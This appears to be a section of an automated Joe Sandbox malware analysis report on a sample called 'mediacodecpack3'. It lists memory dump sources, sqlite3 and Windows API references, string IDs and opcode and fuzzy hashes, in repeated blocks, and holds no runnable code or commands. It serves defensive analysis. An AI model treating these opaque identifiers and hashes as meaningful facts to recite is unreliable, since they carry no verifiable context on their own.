                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: sqlite_master$sqlite_sequence$sqlite_temp_master
                                                                                            • API String ID: 0-1177837799
                                                                                            • Opcode ID: 220fba3a2fb3ab4d5034cb0a2e8c7e996f73753fd556fb076663e5e6b14f60a3
                                                                                            • Instruction ID: e5240d50caebec33bd4ce83d4b9fb982fe545a794019e3d400788b6e3ec19482
                                                                                            • Opcode Fuzzy Hash: 220fba3a2fb3ab4d5034cb0a2e8c7e996f73753fd556fb076663e5e6b14f60a3
                                                                                            • Instruction Fuzzy Hash: F7C13974B062089BDB05DF68D49179EBBF3AFA8308F14C42DE8899B345DB39D841CB41
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
                                                                                            • String ID:
                                                                                            • API String ID: 1648232842-0
                                                                                            • Opcode ID: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                            • Instruction ID: a01add595a6c287de5924383f0ed77e5cc34082cd65fcd393cbe5beac3228527
                                                                                            • Opcode Fuzzy Hash: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                            • Instruction Fuzzy Hash: 4531C0B4A042058FDB04DF29C094B5ABBE2FF98354F1484A9EC498F349D779E846CBA0
                                                                                            APIs
                                                                                            • sqlite3_step.SQLITE3 ref: 609614AB
                                                                                            • sqlite3_reset.SQLITE3 ref: 609614BF
                                                                                              • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                              • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 609614D4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
                                                                                            • String ID:
                                                                                            • API String ID: 3429445273-0
                                                                                            • Opcode ID: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                            • Instruction ID: 62863439de2fabb71fd3664abc4fbfc11ff04353a6e6e3e42574d1c19fb7889d
                                                                                            • Opcode Fuzzy Hash: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                            • Instruction Fuzzy Hash: AE316470A183408BEF15CF69C1C5749FBA6AFA7348F188599DC864F30AD375D884C752
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_snprintf$sqlite3_stricmpsqlite3_value_text
                                                                                            • String ID:
                                                                                            • API String ID: 1035992805-0
                                                                                            • Opcode ID: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
                                                                                            • Instruction ID: 84d28b158f1a11e063f70be148de9c7b2eff514b3bcf7808f17aa895500be78a
                                                                                            • Opcode Fuzzy Hash: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
                                                                                            • Instruction Fuzzy Hash: 8C3178B0A08324DFEB24CF28C481B4ABBF6FBA5318F04C499E4888B251C775D885DF42
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
                                                                                            • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
                                                                                            • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
                                                                                            • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 1477753154-0
                                                                                            • Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                            • Instruction ID: 848dca46e936c6e01d33e08870ae11aa620bd8b24bdb606da7ea596206f2e213
                                                                                            • Opcode Fuzzy Hash: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                            • Instruction Fuzzy Hash: 44111F726186218FDB00EF7DC8817597FEAFB66308F00842DE865E7362E779D8819741
                                                                                            APIs
                                                                                            • sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                              • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                            • sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 2673540737-0
                                                                                            • Opcode ID: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                            • Instruction ID: c4988029ba64cfb2248a7cf0c790324acf4c13eb0f9cd3f15fdedc175ef3c91a
                                                                                            • Opcode Fuzzy Hash: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                            • Instruction Fuzzy Hash: F9019276E143148BCB00EF79D88561ABFE7FBA5324F008528EC9497364E735DC408B81
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                                            • String ID:
                                                                                            • API String ID: 3526213481-0
                                                                                            • Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                            • Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
                                                                                            • Opcode Fuzzy Hash: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                            • Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
                                                                                            APIs
                                                                                            • sqlite3_prepare.SQLITE3 ref: 60969166
                                                                                            • sqlite3_errmsg.SQLITE3 ref: 60969172
                                                                                              • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                                                            • sqlite3_errcode.SQLITE3 ref: 6096918A
                                                                                              • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
                                                                                            • sqlite3_step.SQLITE3 ref: 60969197
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
                                                                                            • String ID:
                                                                                            • API String ID: 2877408194-0
                                                                                            • Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                            • Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
                                                                                            • Opcode Fuzzy Hash: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                            • Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_blobsqlite3_value_bytes
                                                                                            • String ID:
                                                                                            • API String ID: 1163609955-0
                                                                                            • Opcode ID: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                                                            • Instruction ID: 8e0d1a1b7fe9adeaf330fda5a565ce202833de3a42fcd494fa905fee92021967
                                                                                            • Opcode Fuzzy Hash: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                                                            • Instruction Fuzzy Hash: F6F0C8716282145FC3106F3994816697BE6DFA6758F0144A9F584CB314DB75CC82C742
                                                                                            APIs
                                                                                            • sqlite3_prepare_v2.SQLITE3 ref: 609615BA
                                                                                            • sqlite3_step.SQLITE3 ref: 609615C9
                                                                                            • sqlite3_column_int.SQLITE3 ref: 609615E1
                                                                                              • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                                            • sqlite3_finalize.SQLITE3 ref: 609615EE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_column_intsqlite3_finalizesqlite3_prepare_v2sqlite3_stepsqlite3_value_int
                                                                                            • String ID:
                                                                                            • API String ID: 4265739436-0
                                                                                            • Opcode ID: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
                                                                                            • Instruction ID: 970f7a8085286b868af170b9ae73916577c28f03d50975cfa6e3c5bd991c66ad
                                                                                            • Opcode Fuzzy Hash: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
                                                                                            • Instruction Fuzzy Hash: BE01E4B0D083049BEB10EF69C58575EFBF9EFA5314F00896DE8A997380E775D9408B82
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 609084E9
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 60908518
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 60908528
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6090855B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 1477753154-0
                                                                                            • Opcode ID: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                                            • Instruction ID: c41a4d3f3efa942db11cbd34a9101edfe28f26dd6f673ba1da0d5803e4a0adbd
                                                                                            • Opcode Fuzzy Hash: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                                            • Instruction Fuzzy Hash: FD01A4B05093048BDB40AF25C5D97CABBA5EF15718F0884BDEC894F34AD7B9D5448BA1
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log
                                                                                            • String ID: into$out of
                                                                                            • API String ID: 632333372-1114767565
                                                                                            • Opcode ID: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                            • Instruction ID: de20b162988cb891a2f8fbcf22309076e3e21d241eadb06c465d82de9f0e8d92
                                                                                            • Opcode Fuzzy Hash: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                            • Instruction Fuzzy Hash: 91910170A043149BDB26CF28C88175EBBBABF65308F0481E9E858AB355D7B5DE85CF41
                                                                                            APIs
                                                                                              • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
                                                                                            • sqlite3_free.SQLITE3 ref: 609193A3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_value_text
                                                                                            • String ID: (NULL)$NULL
                                                                                            • API String ID: 2175239460-873412390
                                                                                            • Opcode ID: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                            • Instruction ID: 63658e955800b40111a930d2026d12727b3b294c4be858d68b3f7c51d7abf176
                                                                                            • Opcode Fuzzy Hash: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                            • Instruction Fuzzy Hash: E3514B31F0825A8EEB258A68C89479DBBB6BF66304F1441E9C4A9AB241D7309DC6CF01
                                                                                            APIs
                                                                                            • GetCPInfo.KERNEL32(?,00000000), ref: 00405BB3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: Info
                                                                                            • String ID: $
                                                                                            • API String ID: 1807457897-3032137957
                                                                                            • Opcode ID: d62f257e1640a576e7c9989f97778ac9c58cbb7090796bbb9a31cafd0bd77437
                                                                                            • Instruction ID: d944e0326c6926f7701021ceed1c995ec26cf4905102b61f872e2d2972a5c282
                                                                                            • Opcode Fuzzy Hash: d62f257e1640a576e7c9989f97778ac9c58cbb7090796bbb9a31cafd0bd77437
                                                                                            • Instruction Fuzzy Hash: 824168300186589AFB119724CD89BFB3FA9EB05B00F1400FAD586FB1D2C2394954DFAA
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log
                                                                                            • String ID: string or blob too big$|
                                                                                            • API String ID: 632333372-330586046
                                                                                            • Opcode ID: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                            • Instruction ID: 65a9847582dc10a4f4f17f1c4fc8d82f10366072c52f03016cacc5a11d353e3e
                                                                                            • Opcode Fuzzy Hash: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                            • Instruction Fuzzy Hash: 4D51B9749083689BCB22CF28C985789BBF6BF59314F1086D9E49897351C775EE81CF41
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log
                                                                                            • String ID: d$|
                                                                                            • API String ID: 632333372-415524447
                                                                                            • Opcode ID: b41da94c8e0873fb31ce46b9bf1ec845f2d469f37e36bd2a55cc8f8885e561b5
                                                                                            • Instruction ID: dac03e427e93f591f5d1737f90c886445feec93ea56e6f6f32424ebbe55d5cce
                                                                                            • Opcode Fuzzy Hash: b41da94c8e0873fb31ce46b9bf1ec845f2d469f37e36bd2a55cc8f8885e561b5
                                                                                            • Instruction Fuzzy Hash: 50510970A04329DBDB26CF19C981799BBBABF55308F0481D9E958AB341D735EE81CF41
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log
                                                                                            • String ID: -- $d
                                                                                            • API String ID: 632333372-777087308
                                                                                            • Opcode ID: 04c39e600f9b005651fcb68da317ac4a80b79d2e803021aaf364a84fff9736a0
                                                                                            • Instruction ID: 827f605eab188c5b26b82399601ab0ab65c2dc521f736992582695f4996adf34
                                                                                            • Opcode Fuzzy Hash: 04c39e600f9b005651fcb68da317ac4a80b79d2e803021aaf364a84fff9736a0
                                                                                            • Instruction Fuzzy Hash: 5651F674A042689FDB26CF28C885789BBFABF55304F1081D9E99CAB341C7759E85CF41
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
